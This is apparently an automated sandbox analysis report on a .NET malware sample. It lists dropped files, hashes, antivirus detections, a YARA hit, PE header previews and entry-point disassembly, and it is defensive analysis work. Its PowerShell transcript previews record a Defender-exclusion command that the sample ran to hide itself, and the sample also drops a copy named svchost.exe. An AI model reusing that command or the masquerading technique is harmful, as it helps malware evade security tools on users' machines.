                    SHA-512:CC3E104C1F4F84DA784FF37082EDDF8BB65CD9E919F0F3C383F27DADEC2FA0BC538E25811032D43ABC1A85F4CA835BE5ECB3947306D6566A3258398CAE28D3F3
                    Malicious:false
                    Reputation:unknown
                    Preview: B...T.i.m.e.r.R.e.s.o.l.u.t.i.o.n. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.5.6.2.5.0.....B...P.a.g.e.S.i.z.e. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .4.0.9.6.....B...N.u.m.b.e.r.O.f.P.h.y.s.i.c.a.l.P.a.g.e.s. . . . . . . . . . . . . . . . . . . . . . . . . . .1.0.4.8.3.1.5.....B...L.o.w.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . . . . . . . . .1.....B...H.i.g.h.e.s.t.P.h.y.s.i.c.a.l.P.a.g.e.N.u.m.b.e.r. . . . . . . . . . . . . . . . . . . . . . .1.3.1.0.7.1.9.....B...A.l.l.o.c.a.t.i.o.n.G.r.a.n.u.l.a.r.i.t.y. . . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.i.n.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . . . . . . . . . . . .6.5.5.3.6.....B...M.a.x.i.m.u.m.U.s.e.r.M.o.d.e.A.d.d.r.e.s.s. . . . . . . . . . . . . . . . . .1.4.0.7.3.7.4.8.8.2.8.9.7.9.1.....B...A.c.t.i.v.e.P.r.o.c.e.s.s.o.r.s.A.f.f.i.n.i.t.y.M.a.s.k. . . . . . .
                    C:\Users\Public\Documents\???????????????\svchost.exe
                    Process:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Category:dropped
                    Size (bytes):12288
                    Entropy (8bit):5.685668719560744
                    Encrypted:false
                    SSDEEP:192:1xOLat6Hg6ZVHKhS2FtX20G1uDUcmuU/Vbw95si8:18LaJIHKE2FtXvGRcm3/xw/sp
                    MD5:0475ED517DA8A71BC4A87F14A44CF8FE
                    SHA1:311E146BCC1A342AB135240E0C8E31730F8AD879
                    SHA-256:F475DDA218513A22EDC7EC2E734FB91DDF60DC7B38B87E7DE487DE6FE9307E47
                    SHA-512:9087831B5E355F48D38DF716982125865AEFDE794AD8C1ECDD68606A4A338182EFF4A2B7BCF7DC29098178B9FD485A599EAE2A011F01257536C3B0B0F9AC5F58
                    Malicious:true
                    Yara Hits:
                    • Rule: SUSP_PE_Discord_Attachment_Oct21_1, Description: Detects suspicious executable with reference to a Discord attachment (often used for malware hosting on a legitimate FQDN), Source: C:\Users\Public\Documents\???????????????\svchost.exe, Author: Florian Roth
                    Antivirus:
                    • Antivirus: Joe Sandbox ML, Detection: 100%
                    • Antivirus: Virustotal, Detection: 62%, Browse
                    • Antivirus: Metadefender, Detection: 23%, Browse
                    • Antivirus: ReversingLabs, Detection: 79%
                    Reputation:unknown
                    Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....................0..(...........F... ...`....@.. ....................................@..................................E..S....`............................................................................... ............... ..H............text...$&... ...(.................. ..`.rsrc........`.......*..............@..@.reloc..............................@..B.................F......H........&...............&...............................................*&.(......*".......*".(.....*Vs....(....t.........*".(.....*".(.....*...0..9........~.........,".r...p.....(....o....s............~.....+..*....0...........~.....+..*..0...........~.....+..*..0............(......(......(......(......(.....s......(......(......(......(......(.....+...9....o......(......(......(......(......(.....(......(......(......(......(......(......(.....s....(......(......(......(..
                    C:\Users\Public\Documents\???????????????\svchost.exe:Zone.Identifier
                    Process:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    File Type:ASCII text, with CRLF line terminators
                    Category:modified
                    Size (bytes):26
                    Entropy (8bit):3.95006375643621
                    Encrypted:false
                    SSDEEP:3:ggPYV:rPYV
                    MD5:187F488E27DB4AF347237FE461A079AD
                    SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                    SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                    SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                    Malicious:true
                    Reputation:unknown
                    Preview: [ZoneTransfer]....ZoneId=0
                    C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):21648
                    Entropy (8bit):5.589590284716383
                    Encrypted:false
                    SSDEEP:384:ltLNkl4xdTAZVr0aGZRcSBKnEjiltIC8tpEQeZUT1u16zS5maxHV03cj6IvUI++w:64xdTAT4aZ4KEmlt4nEpW3SUCicml1
                    MD5:9F83AB720915C4F4E190DD1276553368
                    SHA1:7A960C4F6E87DFA41F3BEF765AC9A1AE6AA5FAAA
                    SHA-256:0D4371B24FB184E829DFA5086625B2F5755AB052E1976D2A4BA344B988A158A3
                    SHA-512:DFA376E02094BF9CE9A6A70E82163A0E283FFBB0821D4692F6268A230B891D73EBADC3E63A1AC295ACFDAAEFB8B9BE406F24D97C2B9AE018C2C857339B84DC45
                    Malicious:false
                    Reputation:unknown
                    Preview: @...e.....................L.B.8.....[.U.#.p..........@..........H...............<@.^.L."My...:P..... .Microsoft.PowerShell.ConsoleHostD...............fZve...F.....x.)\.......System.Management.Automation4...............[...{a.C..%6..h.........System.Core.0...............G-.o...A...4B..........System..4................Zg5..:O..g..q..........System.Xml..L...............7.....J@......~.......#.Microsoft.Management.Infrastructure.8................'....L..}............System.Numerics.@................Lo...QN......<Q........System.DirectoryServices<................H..QN.Y.f............System.Management...4....................].D.E.....#.......System.Data.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<.................~.[L.D.Z.>..m.........System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,i.....(.Microsoft.PowerShell.Commands.ManagementT................7.,.fiD..............*.Microsoft.Management.Inf
                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ho4foeqb.0i0.psm1
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:unknown
                    Preview: 1
                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iv3dhn2m.uea.psm1
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:unknown
                    Preview: 1
                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lw2heqtk.31p.ps1
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:unknown
                    Preview: 1
                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_moqz0t4j.pro.ps1
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:unknown
                    Preview: 1
                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pc04nqq2.yth.ps1
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:unknown
                    Preview: 1
                    C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ptyas2nv.xit.psm1
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:very short file (no magic)
                    Category:dropped
                    Size (bytes):1
                    Entropy (8bit):0.0
                    Encrypted:false
                    SSDEEP:3:U:U
                    MD5:C4CA4238A0B923820DCC509A6F75849B
                    SHA1:356A192B7913B04C54574D18C28D46E6395428AB
                    SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
                    SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
                    Malicious:false
                    Reputation:unknown
                    Preview: 1
                    C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\catalog.dat
                    Process:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):232
                    Entropy (8bit):7.109925499344649
                    Encrypted:false
                    SSDEEP:6:X4LDAnybgCFcps0OaNGElBf3xGwy0bQMLZqdrKvn1gfjuWQd:X4LEnybgCF0NG2fw6ExK1g6Ld
                    MD5:678166F4CB8E67FED18F334AB43A6B9F
                    SHA1:2AA698BE0D8BDD534749B315856D962A3325F6C9
                    SHA-256:A773767D5714808BD7D8E1B5F496659682E5C0F5D01D012F49AFFE5F280591A4
                    SHA-512:8EA515FF84B08D5807F8485448F2BFEE9AE5AF0FEE4F7234D2610D4B804B1C348679B0D62E36247F7313CC9FAC3DC4EA22E14A668819B52607A8794F9579DEFC
                    Malicious:false
                    Reputation:unknown
                    Preview: Gj.h\.3.A...5.x..&...i+..c(1.P..P.cLT...A.b........4h...t.+..Z\.. .i.... S....}FF.2...h.M+....L.#.X..+......*....`*kZ..JR<..e.8....z...O......f..m.PQ>Y...}.....K.,Kl..G.....qA..#.w.&..7m..B.I.....in..<5J....z).H?....6..*2
                    C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat
                    Process:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    File Type:Non-ISO extended-ASCII text, with no line terminators
                    Category:dropped
                    Size (bytes):8
                    Entropy (8bit):3.0
                    Encrypted:false
                    SSDEEP:3:L8t:It
                    MD5:802E047E203AA553E339BF5A78C187D9
                    SHA1:6F59F37BD55E5121EAE8C5ED7C63275DFCFC25B7
                    SHA-256:3F4D6818E00E01A5038552BF7F774B006B1BD97703D68158A2608207CF2196D8
                    SHA-512:4CE556B703B450B6271D6734AA56E5539567056F3D8F9C33A7C7FFD850382FF8C34DDE326E03C938C9219119D2C86C325D8B30CF39BDD6781B9BE079427B8276
                    Malicious:true
                    Reputation:unknown
                    Preview: ..B...H
                    C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\settings.bin
                    Process:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):40
                    Entropy (8bit):5.153055907333276
                    Encrypted:false
                    SSDEEP:3:9bzY6oRDT6P2bfVn1:RzWDT621
                    MD5:4E5E92E2369688041CC82EF9650EDED2
                    SHA1:15E44F2F3194EE232B44E9684163B6F66472C862
                    SHA-256:F8098A6290118F2944B9E7C842BD014377D45844379F863B00D54515A8A64B48
                    SHA-512:1B368018907A3BC30421FDA2C935B39DC9073B9B1248881E70AD48EDB6CAA256070C1A90B97B0F64BBE61E316DBB8D5B2EC8DBABCD0B0B2999AB50B933671ECB
                    Malicious:false
                    Reputation:unknown
                    Preview: 9iH...}Z.4..f.~a........~.~.......3.U.
                    C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\storage.dat
                    Process:C:\Users\user\Desktop\p9Ts9VV2NZ.exe
                    File Type:data
                    Category:dropped
                    Size (bytes):315512
                    Entropy (8bit):7.999402922203056
                    Encrypted:true
                    SSDEEP:6144:m8aeVE5MlgWfxwY/8uvJYRDMVpXUhXShjVd/WNXlMjwmZ/zVR5X7HZEKiMIqrjG:mfwiMdxwYEYyWVjVpW7mZBDCgrjG
                    MD5:787AEB1604A638B138739ED060141E9D
                    SHA1:A2D0680883E8C6FF3DDE0A177263B03E7644D4AA
                    SHA-256:DCCB67209560E2E27A4F284CD7E412926303ABD4E77927F9A1BAF8B0B8994B45
                    SHA-512:9E49E851465F07ABA6AB44AD6B7561004AD61C4794FE167C6C724994159714AF8D2AC8ECCCE128F84BC6A7607BA05CD891CFD2C9EDE9D9EFA860346F6004360E
                    Malicious:false
                    Reputation:unknown
                    Preview: ..f# ....)1\*.....5....;.T..u.. .3.Xd... ....u(..._.V.{L..Y.8....~...S79.f0V...=.}...SJg|.lh.J..^Ge.........3h?n..:..r....,o."a.I....\..0Z.D..........^....[..f.I....@/_..".5+...I...J`./s..p-.....c..?...*.. .&.....>.Ye$=.pG.....9D...'7.w.a.[3.d.-..V..]..B.b.zA?..M..3...%A....K5@.. j.U.h.B....'...0."..u.V...d..c,r"..@9.9.>..cDgP~d9..St...{..24.s.'.....9.D..P4.....I...G..G5......u.-2...z1[.....C..n.6.!..'.%@&.l4..P..rc+vq..C5B.b*..j.W,..T..z......)BX4...>A.*~#..A....8..B....5....w....GC..........y......7...?.T.....!.....7A.........C.3......A.....hC..5'..42..zS.*2.m7....A.'/.R..X....}e...>........}...n.A...4..?.P.l..n.0.I`...".d1.(e|..f.....i.9.#...n..+..l....Xz.q...6".Hl...+...1^pgs...%.FR.T....(...=.rHX.d.9%...?..f?.Q.yi.D9/>....V..5......q...nP'...S.Y.....pu.!..-..\..|/....V.......NX....../.8..V.0.5`m$.{b..lw.K.3-..C3...-.2.Qb.....o...6z....`H...(..o.ag.-7../F..RoI..O#.u|.U.@....$;.....s.~.M...j?...q#.l..y..M.[../.....=T.......5HX.QJ...
                    C:\Users\user\Documents\20211026\PowerShell_transcript.724471.ZeIE8f8i.20211026190014.txt
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):6101
                    Entropy (8bit):5.560839462783106
                    Encrypted:false
                    SSDEEP:96:BZTh5NfhCqDo1ZRhCZyh5NfhCqDo1ZgDhNFhNrhNjZth5NfhCqDo1ZakhN7hN7hg:xI1XFr5G77W
                    MD5:EB4214B4C2951AF3943E6DDBE04A86E2
                    SHA1:3A29D17AC69DB537638A7125A548EC3552E3C23A
                    SHA-256:2C3A58FE9E3C618AEA0797F6F2C5EB1CFB8BADA1435B3683AE2DE1051C53BD08
                    SHA-512:1769F76D30829B4C6EBF107C20352A0A7C3487DCAF514C3008500920408567B387678B68C1AF82E8A805272C3101013CEBE60B015A1FA5009A12E3B0026E9CE2
                    Malicious:false
                    Reputation:unknown
                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211026190016..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 724471 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..Process ID: 5772..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211026190016..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..**********************..Windows PowerShell transcript start..Sta
                    C:\Users\user\Documents\20211026\PowerShell_transcript.724471.c_cmsXQy.20211026190012.txt
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):6101
                    Entropy (8bit):5.55983489904086
                    Encrypted:false
                    SSDEEP:96:BZth5NfhEqDo1ZjhCZdh5NfhEqDo1ZPNDhNFhNrhNjZJh5NfhEqDo1Z9khN7hN7i:DcW4xFrdf77i
                    MD5:27EC75586936E72337F465B745364BA3
                    SHA1:C4B2660C743F8ACD48BD0A0209706EAFD7EBDE52
                    SHA-256:1D930807B7F449762DDF62D3809B751054565BC066DEE6FDF3EF3A0C12EAC40D
                    SHA-512:006FA91F32CC9068CD81992730FDA3FAE7E9B6640B1004863F5473DCF1C840F337C5ACE4A35A7A8E9125F599402B99255023E779C266D81FA7B3B0B10CF73BE9
                    Malicious:false
                    Reputation:unknown
                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211026190014..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 724471 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..Process ID: 1068..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211026190014..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\Public\Documents\...............\svchost.exe -Force..**********************..Windows PowerShell transcript start..Sta
                    C:\Users\user\Documents\20211026\PowerShell_transcript.724471.woCflA5d.20211026190013.txt
                    Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                    Category:dropped
                    Size (bytes):5785
                    Entropy (8bit):5.412494234201159
                    Encrypted:false
                    SSDEEP:96:BZTh5NE3qDo1ZUZVnh5NE3qDo1ZPVSQ6jZKLh5NE3qDo1Zo7qqOZl:n
                    MD5:FBB7F493BD81C6DA59C022BA3600D478
                    SHA1:BE0797BB8CDB8C51D9B9D88FACF8E77C3FA561A6
                    SHA-256:9022F1959BCCF3D2B6AAB94AE2189B970267B28780BEE8E131319E301EC5D2C6
                    SHA-512:DEF43C8E076C93795A1200ED28F2C342D58DA1E86E6F4579776827DC829007EE369B55B443663D524EB4986FD634CD02781C3CBA3F4BD23E591667FD57A8E858
                    Malicious:false
                    Reputation:unknown
                    Preview: .**********************..Windows PowerShell transcript start..Start time: 20211026190016..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 724471 (Microsoft Windows NT 10.0.17134.0)..Host Application: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath C:\Users\user\Desktop\p9Ts9VV2NZ.exe -Force..Process ID: 5684..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20211026190016..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\Desktop\p9Ts9VV2NZ.exe -Force..**********************..Windows PowerShell transcript start..Start time: 20211026190447..Username: computer\user..RunAs User: computer\user.
                    C:\Windows\appcompat\Programs\Amcache.hve
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:MS Windows registry file, NT/2000 or above
                    Category:dropped
                    Size (bytes):1572864
                    Entropy (8bit):4.277178027778069
                    Encrypted:false
                    SSDEEP:12288:dbncTxn4CGfr0wPRZLyaeKnnHVdkKii04UgHZoeKL//lw4y/S769W:JncTxn4CGfr0wP5P
                    MD5:0BDB806F1CE4A7E4352C99873C1C4CA8
                    SHA1:ED6F9DA1B5A0EF243F5EC3CADE9C7F85D211C68E
                    SHA-256:966DCD29AC2CB3ED6A7999342D65DDAF2D70CB7562B560CC142EBABA19EF9D3B
                    SHA-512:DC145604828B23D4AF0CB372FA24D806466C0118E39444BB81D420C8F3F446FD6149D527F445ED1626C6F3611265EA848574408F573A6DFB0EE7FECBD82D4813
                    Malicious:false
                    Reputation:unknown
                    Preview: regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..fj................................................................................................................................................................................................................................................................................................................................................<.b7........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                    C:\Windows\appcompat\Programs\Amcache.hve.LOG1
                    Process:C:\Windows\SysWOW64\WerFault.exe
                    File Type:MS Windows registry file, NT/2000 or above
                    Category:dropped
                    Size (bytes):32768
                    Entropy (8bit):4.179416825011699
                    Encrypted:false
                    SSDEEP:768:SywdClMwqhor4Fftx1aJ4XY3FG7oBqXEeq5QMVyi6a64LXjuz2yL02:Cfo4APWCRpK
                    MD5:C00A6312C114BDF6E2FBAA64E87594D5
                    SHA1:BCD65B5D7CD4ED0490D8B60B9DA6D5721FB8DD8F
                    SHA-256:044B382D18BB070F67A89C8DF299BE70A713DFEAAE8548679609A15F4B2DA877
                    SHA-512:897BCD88ACBBFBD92C8B9421E77F07FC7FA2B747B26FBB226C33E99C9BE23E49CA23ABE8AE73B5F2A6C233513734AEA1A61327C5174DB39EEB9C55D14D7CAB78
                    Malicious:false
                    Reputation:unknown
                    Preview: regfY...Y...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm..fj................................................................................................................................................................................................................................................................................................................................................:.b7HvLE.~......Y............:.p..Qa...2............ ....... .......0................... ..hbin................p.\..,..........nk,...ij.................................... ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ...ij........ ........................... .......Z.......................Root........lf......Root....nk ...ij.....................}.............. ...............*...............DeviceCensus.......................vk..................WritePer

                    Static File Info

                    General

                    File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                    Entropy (8bit):5.685668719560744
                    TrID:
                    • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                    • Win32 Executable (generic) a (10002005/4) 49.78%
                    • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                    • Generic Win/DOS Executable (2004/3) 0.01%
                    • DOS Executable Generic (2002/1) 0.01%
                    File name:p9Ts9VV2NZ.exe
                    File size:12288
                    MD5:0475ed517da8a71bc4a87f14a44cf8fe
                    SHA1:311e146bcc1a342ab135240e0c8e31730f8ad879
                    SHA256:f475dda218513a22edc7ec2e734fb91ddf60dc7b38b87e7de487de6fe9307e47
                    SHA512:9087831b5e355f48d38df716982125865aefde794ad8c1ecdd68606a4a338182eff4a2b7bcf7dc29098178b9fd485a599eae2a011f01257536c3b0b0f9ac5f58
                    SSDEEP:192:1xOLat6Hg6ZVHKhS2FtX20G1uDUcmuU/Vbw95si8:18LaJIHKE2FtXvGRcm3/xw/sp
                    File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..(...........F... ...`....@.. ....................................@................................

                    File Icon

                    Icon Hash:00828e8e8686b000

                    Static PE Info

                    General

                    Entrypoint:0x40461e
                    Entrypoint Section:.text
                    Digitally signed:false
                    Imagebase:0x400000
                    Subsystem:windows gui
                    Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                    DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                    Time Stamp:0xA999CAFB [Tue Mar 2 04:47:55 2060 UTC]
                    TLS Callbacks:
                    CLR (.Net) Version:v4.0.30319
                    OS Version Major:4
                    OS Version Minor:0
                    File Version Major:4
                    File Version Minor:0
                    Subsystem Version Major:4
                    Subsystem Version Minor:0
                    Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                    Entrypoint Preview

                    Instruction
                    jmp dword ptr [00402000h]
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al
                    add byte ptr [eax], al

                    Data Directories

                    NameVirtual AddressVirtual Size Is in Section
                    IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                    IMAGE_DIRECTORY_ENTRY_IMPORT0x45c80x53.text
                    IMAGE_DIRECTORY_ENTRY_RESOURCE0x60000x3f4.rsrc
                    IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                    IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                    IMAGE_DIRECTORY_ENTRY_BASERELOC0x80000xc.reloc
                    IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
